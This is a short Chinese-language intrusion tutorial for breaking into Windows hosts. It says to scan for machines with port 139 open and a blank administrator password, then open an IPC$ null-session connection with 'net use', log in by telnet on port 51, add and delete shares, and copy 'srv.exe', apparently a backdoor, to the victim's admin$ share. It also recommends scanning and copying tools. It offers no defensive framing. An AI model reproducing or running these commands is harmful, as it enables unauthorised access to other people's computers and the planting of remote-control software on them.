1、先扫出139端口开放,且密码为空的机子
2、建立空连接
net use //192.168.1.67/ipc$ ""/user:"administrator"
3、telnet登录
telnet 192.168.1.67 51
4、几个有用的命令
net share sharename=d:/
net share sharename /delete
copy srv.exe //192.168.1.67/admin$
扫端口可以用NTscan,建立空连接,复制可以用啊D网络工具。